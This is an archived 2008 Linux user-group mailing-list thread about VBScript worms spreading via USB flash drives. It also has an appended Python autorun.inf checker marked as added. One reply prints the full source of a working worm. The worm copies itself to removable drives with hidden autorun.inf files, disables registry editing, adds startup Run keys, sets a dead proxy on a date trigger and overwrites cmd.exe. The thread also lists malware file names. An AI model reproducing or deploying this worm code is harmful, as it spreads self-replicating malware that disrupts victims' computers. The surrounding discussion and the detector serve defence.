Guys, which antivirus on the market can already detect this isetup and transmit.exe (black pegasus) variant? It's a real nuisance here at our office, almost everyone has been affected... The worst part is that when you go to M$ Word and click any of the menus, it closes all apps including explorer.exe and then goes back to the beginning...

I'm still trying to push Linux into the environment... people here are still afraid of the OS, but I'm in the process of influencing them hehehe....


On 02 13, 08, at 1:01 AM, hard wyrd wrote:

The "scandal variant" of this script also generates [PEGASUS].TXT on some systems which contains "BLACK PEGASUS" Hacking Team from Agusan del Sur. And also mentions that he/she/they come from STI in Agusan.

That just confirms how prevalent this script is and is being exchanged in the underground too frequently.

On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]> wrote:
From what I know.. the one who made TTMS is from Quezon, Manila...

which is arch is right.. the original is...


 rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"

hmmm... there's also a Funny UST scandal thingy of this... there are a lot... this is what's trending now... scripts that are just meant to annoy the computer, that creep through the computer undetected by anti-virus... mostly VB....

the list of these that I've encountered in the XU internet lab is...

autorun.*
TTM*.*
Desktop.*
imgkulot*.*
RECYCLER\INFO.exe
RECYCLER\RECYCLER.exe
RECYCLER\Desktop.ini
sysdll.exe
krag.exe


RavMon*.*
msv*.dll
scvhosts.exe
scvhost.exe
svhost.exe
C:\Windows\svhost.exe
C:\Windows\svhost32.exe
"New Folder".exe
"Funny UST Scandal.avi.exe"
smss.exe
jay.exe
transmit.exe


isetup.exe

most of them spread via flash disk... as hidden files, system files and read-only files....

then from time to time.. their names change.. then their creeping improves... my last worst encounter was that even when you've gone into safe mode, it still runs... as if it's already in the system... even when you've deleted it in regedit it's still there... msconfig, still there. the last thing I did was delete the RECYCLER folders on all my drives.. since it turns out that's where they were hiding.. hehehehehe... so it was solved right away.. :)

amen...

===================================

On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
Obviously this is offtopic, since the guy's script can only
run in an OS which supports regedit.exe, wscript.exe and the
other MS-apps.

What he did is still cool... it traverses all flashdrives
and then copies itself to them :D

pretty harmless compared to the other naughty scripts but nonetheless
still annoying :D


"DOHHGS Ni TAGA CDOC"

Who wants to claim ownership for this script?
:D

any takers?

---------------------------------------------------------------------- -----------------
'THIS IS A MODIFIED VERSION BY: TTMS
'PROUD TO BE FILIPINO, NOT TO CORRUPTION!

On Error Resume Next

Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd

mycmdfile = "cmd.exe"

mydate = month(now()) & day(now())
myvbsalias = "TTMS" & mydate
myvbsfile = myvbsalias & ".dll.vbs"

atr = "[autorun]" & vbCrLf & _
      "shellexecute=wscript.exe " & myvbsfile

Set fs = CreateObject("Scripting.FileSystemObject")

Dim mf, text, size

Set mf = fs.GetFile(WScript.ScriptFullname)

size = mf.size
check = mf.Drive.drivetype

Set text = mf.openastextstream(1, -2)

Do While Not text.atendofstream
   mysource = mysource & text.readline
   mysource = mysource & vbCrLf
Loop

Do
   Set winpath = fs.GetSpecialFolder(0)

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 32

   Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)

   tf.Write mysource
   tf.Close

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 39

   If (mydate = "318") Then
      Set winsyspath = fs.GetSpecialFolder(1)

      cmd = "@echo off" & vbCrLf & _
            "wscript " & winpath & "\" & myvbsfile

      Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)

      tf.Attributes = 32

      Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)

      tf.Write cmd
      tf.Close

      rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyEnable", 1, "REG_DWORD"
      rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyServer", "0.0.0.0:80"

      rg.RegWrite
"HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer \Control
Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
  End If

  For Each flashdrive In fs.drives
      If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
flashdrive.Path <> "A:" Then
         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 32

         Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
2, True)

         tf.Write mysource
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 39

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 32

Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2,
True)

         tf.Write atr
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 39
      End If
   Next

   Set rg = CreateObject("WScript.Shell")

   rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\System\DisableRegistryTools",
1, "REG_DWORD"

   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO PC"

   rg.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \RunServices\MSConfig",
winpath & "\" & myvbsfile
   rg.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSConfig",
winpath & "\" & myvbsfile


   If check <> 1 Then
      WScript.sleep 200000
   End If

Loop While (check <> 1)

Set sd = CreateObject("WScript.Shell")

sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname

_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph



--
--------------------
http://www.metacatalyst.com
http://www.metacatalyst.org
http://www.zabyer.org

Got my Own Hacker Key:
v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
http://www.hackerkey.com

Registered Linux User: #439468



--
"A dog that has no bite, barks loudest."
Registered Linux User #400165
http://baudizm.blogsome.com
http://www.bayanihanbooks.com
Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup, sybase.public.ase.linux
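
Added example, not part of the thread or of any poster's message: a defensive check for the flash-drive spreading described above. It parses the text of an autorun.inf, flags commands that launch a script host or carry a double extension, and matches a drive-root listing against a subset of the file-name patterns listed in the thread. The function names and the sample inputs are constructed for illustration.

```python
import fnmatch
import re

# Subset of the file-name patterns listed in the thread (drive-root sightings).
PAGE_PATTERNS = ["TTM*.*", "imgkulot*.*", "RavMon*.*", "scvhosts.exe",
                 "scvhost.exe", "svhost.exe", "sysdll.exe", "krag.exe",
                 "jay.exe", "transmit.exe", "isetup.exe"]
# Keys in the [autorun] section that cause something to be executed.
EXEC_KEYS = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")
SCRIPT_HOST = re.compile(r"\b(wscript|cscript)(\.exe)?\b")
# A harmless-looking inner extension followed by an executable one.
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{2,4}\.(exe|vbs|vbe|js|scr|bat|cmd)\b")

def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lowercased."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def audit_autorun(text):
    """List (key, reason) findings for commands worth a closer look."""
    findings = []
    for key, value in parse_autorun(text).items():
        if not EXEC_KEYS.match(key):
            continue
        cmd = value.lower()
        if SCRIPT_HOST.search(cmd):
            findings.append((key, "launches a script host"))
        if DOUBLE_EXT.search(cmd):
            findings.append((key, "double extension"))
    return findings

def match_page_patterns(names):
    """Names from a drive-root listing that match the thread's patterns."""
    return [n for n in names if any(
        fnmatch.fnmatchcase(n.lower(), p.lower()) for p in PAGE_PATTERNS)]

# Constructed samples; the first mirrors the autorun.inf layout in the script.
SAMPLE_BAD = "[autorun]\r\nshellexecute=wscript.exe TTMS213.dll.vbs\r\n"
SAMPLE_OK = "[autorun]\nicon=setup.ico\nopen=setup.exe\nlabel=Installer\n"
SAMPLE_LISTING = ["TTMS213.dll.vbs", "autorun.inf", "report.doc", "SVHOST.EXE"]
```

Name matches are only a triage hint, since the thread itself notes that the names change from time to time; the autorun.inf audit does not depend on them.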